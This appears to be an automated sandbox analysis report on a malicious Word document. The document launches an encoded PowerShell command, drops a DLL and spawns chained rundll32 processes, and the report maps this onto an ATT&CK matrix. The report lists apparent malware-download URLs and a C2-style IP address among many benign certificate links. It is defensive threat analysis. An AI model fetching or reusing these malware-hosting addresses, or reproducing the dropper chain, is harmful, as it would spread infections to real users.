                      Source: Yara matchFile source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.2f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting12Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol15SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncSystem Information Discovery15Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 343979 Sample: N00048481397007.doc Startdate: 25/01/2021 Architecture: WINDOWS Score: 100 72 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->72 74 Antivirus detection for URL or domain 2->74 76 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->76 78 11 other signatures 2->78 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 24 2->17         started        process3 signatures4 92 Suspicious powershell command line found 14->92 94 Very long command line found 14->94 96 Encrypted powershell cmdline option found 14->96 19 powershell.exe 16 11 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 64 traumfrauen-ukraine.de 212.227.200.73, 443, 49167, 49168 ONEANDONE-ASBrauerstrasse48DE Germany 19->64 66 nightlifemumbai.club 172.217.6.174, 49165, 80 GOOGLEUS United States 19->66 68 3 other IPs or domains 19->68 62 C:\Users\user\Lxbfyvkbehaviorgraphcqtr_f\C46T.dll, PE32 19->62 dropped 84 Powershell drops PE file 19->84 26 rundll32.exe 19->26         started        28 rundll32.exe 24->28         started        file7 signatures8 process9 process10 30 rundll32.exe 26->30         started        32 rundll32.exe 28->32         started        signatures11 35 rundll32.exe 2 30->35         started        70 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->70 38 rundll32.exe 32->38         started        process12 signatures13 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->80 40 rundll32.exe 35->40         started        42 rundll32.exe 38->42         started        process14 signatures15 45 rundll32.exe 1 40->45         started        88 Hides that the sample has been downloaded from the Internet (zone.identifier) 42->88 48 rundll32.exe 42->48         started        process16 signatures17 90 Hides that the sample has been downloaded from the Internet (zone.identifier) 45->90 50 rundll32.exe 45->50         started        52 rundll32.exe 48->52         started        process18 signatures19 55 rundll32.exe 1 50->55         started        82 Hides that the sample has been downloaded from the Internet (zone.identifier) 52->82 58 rundll32.exe 52->58         started        process20 signatures21 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 55->86 60 rundll32.exe 55->60         started        process22

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      N00048481397007.doc9%ReversingLabs

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll100%Joe Sandbox ML

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      23.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.270000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.750000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.2f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      21.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.2b0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      24.2.rundll32.exe.2010000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.6b0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      19.2.rundll32.exe.460000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.430000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      22.2.rundll32.exe.450000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      20.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.280000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.400000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://nightlifemumbai.club/x/0wBD3/100%Avira URL Cloudmalware
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://nightlifemumbai.club0%Avira URL Cloudsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      https://traumfrauen-ukraine.de0%Avira URL Cloudsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://traumfrauen-ukraine.de/bin/JyeS/0%Avira URL Cloudsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://traumfrauen-ukraine.de0%Avira URL Cloudsafe
                      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://www.globaltrust.info0=0%Avira URL Cloudsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://www.valicert.10%Avira URL Cloudsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      https://shop.nowfal.dev/wp-includes/RlMObf2j0/100%Avira URL Cloudmalware
                      http://ocsp.sectigo.com0/0%Avira URL Cloudsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                      http://190.55.186.229/pvaadnb3/0%Avira URL Cloudsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                      http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      shop.nowfal.dev
                      104.21.88.166
                      truetrue
                        unknown
                        traumfrauen-ukraine.de
                        212.227.200.73
                        truetrue
                          unknown
                          nightlifemumbai.club
                          172.217.6.174
                          truetrue
                            unknown
                            jflmktg.wpcomstaging.com
                            192.0.78.20
                            truetrue
                              unknown
                              e-wdesign.eu
                              unknown
                              unknowntrue
                                unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://nightlifemumbai.club/x/0wBD3/true
                                • Avira URL Cloud: malware
                                unknown
                                http://traumfrauen-ukraine.de/bin/JyeS/true
                                • Avira URL Cloud: safe
                                unknown
                                http://190.55.186.229/pvaadnb3/true
                                • Avira URL Cloud: safe
                                unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.a-cert.at0Epowershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.certplus.com/CRL/class3.crl0powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.e-me.lv/repository0powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.acabogacia.org/doc0powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://crl.chambersign.org/chambersroot.crl0powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.certifikat.dk/repository0powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://nightlifemumbai.clubpowershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.chambersign.org1powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://repository.swisssign.com/0powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpfalse
                                  high
                                  http://crl.ssc.lt/root-c/cacrl.crl0powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://traumfrauen-ukraine.depowershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlpowershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://ca.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.certplus.com/CRL/class3P.crl0powershell.exe, 00000005.00000002.2334351202.000000001CF80000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://repository.infonotary.com/cps/qcps.html0$powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.post.trust.ie/reposit/cps.html0powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://traumfrauen-ukraine.depowershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.certplus.com/CRL/class2.crl0powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.globaltrust.info0=powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://servername/isapibackend.dllpowershell.exe, 00000005.00000002.2336945072.000000001D560000.00000002.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.valicert.1powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.ssc.lt/cps03powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://shop.nowfal.dev/wp-includes/RlMObf2j0/powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://ocsp.sectigo.com0/powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2334588090.0000000001DC0000.00000002.00000001.sdmpfalse
                                    high
                                    http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000005.00000003.2325890478.000000001D051000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://ocsp.pki.gva.es0powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.oces.certifikat.dk/oces.crl0powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.ssc.lt/root-b/cacrl.crl0powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.certicamara.com/dpc/0Zpowershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmpfalse
                                      high
                                      http://crl.pki.wellsfargo.com/wsprca.crl0powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.dnie.es/dpc0powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.rootca.or.kr/rca/cps.html0powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.trustcenter.de/guidelines0powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.globaltrust.info0powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://certificates.starfieldtech.com/repository/1604powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.entrust.net/CRL/Client1.crl0powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.entrust.net/CRL/net1.crl0powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmpfalse
                                                high
                                                https://www.catcert.net/verarrelpowershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.disig.sk/ca0fpowershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.e-szigno.hu/RootCA.crlpowershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.signatur.rtr.at/current.crl0powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.quovadis.bm0powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.firmaprofesional.com0powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
